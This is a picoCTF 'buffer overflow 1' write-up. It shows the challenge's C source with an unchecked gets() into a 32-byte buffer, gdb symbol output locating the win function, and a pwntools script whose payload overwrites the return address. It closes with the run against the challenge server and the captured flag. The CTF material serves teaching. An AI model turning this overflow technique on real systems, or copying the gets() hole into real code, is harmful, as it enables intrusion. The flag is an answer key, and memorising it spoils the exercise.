buffer overflow1
*  
binary  
picoctf

Control the return address and arguments
Source code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFSIZE 32
#define FLAGSIZE 64

void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}

fgets(buf,FLAGSIZE,f);
printf(buf);
}

void vuln(){
char buf[BUFSIZE];
gets(buf);

printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

int main(int argc, char **argv){

setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);

puts("Please enter your string: ");
vuln();
return 0;
}
To solve this challenge I had to overwrite the return address with the address of the win function.
What I needed:
-the size of the string such that I overwrite the right address: 44 + 4 bytes
(I tested strings of different sizes until the return address was a substring of my string)
-the address of the win function:0x080491f6
(I used info functions command in gdb)
Non-debugging symbols:
0x08049000 _init
0x08049040 printf@plt
0x08049050 gets@plt
0x08049060 fgets@plt
0x08049070 getegid@plt
0x08049080 puts@plt
0x08049090 exit@plt
0x080490a0 __libc_start_main@plt
0x080490b0 setvbuf@plt
0x080490c0 fopen@plt
0x080490d0 setresgid@plt
0x080490e0 _start
0x08049120 _dl_relocate_static_pie
0x08049130 __x86.get_pc_thunk.bx
0x08049140 deregister_tm_clones
0x08049180 register_tm_clones
0x080491c0 __do_global_dtors_aux
0x080491f0 frame_dummy
0x080491f6 win
0x08049281 vuln

The python code for solving the challenge:
from pwn import *

context.update(arch='i386', os='linux')

def loc():
binary = './vuln'
p = process(binary)
print(p.recvuntil(b"string: \n"))
payload = b'A' * 32 + b'B'*12 +b'\x3d\x93\x04\x08'+ b'\xf6\x91\x04\x08'
p.sendline(payload)
p.interactive()

def rem():
r = remote("saturn.picoctf.net",50648)
print(r.recvuntil(b"string: \n"))
payload = b'A' * 32 + b'B'*12 + b'\xf6\x91\x04\x08'
r.sendline(payload)
r.interactive()
print(r.recvline())

rem()

buffer overflow 1$ python3 script.py
[+] Opening connection to saturn.picoctf.net on port 50648: Done
b'Please enter your string: \n'
[*] Switching to interactive mode
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{addr3ss3s_ar3_3asy_6462ca2d}[*] Got EOF while reading in interactive

picoCTF{addr3ss3s_ar3_3asy_6462ca2d}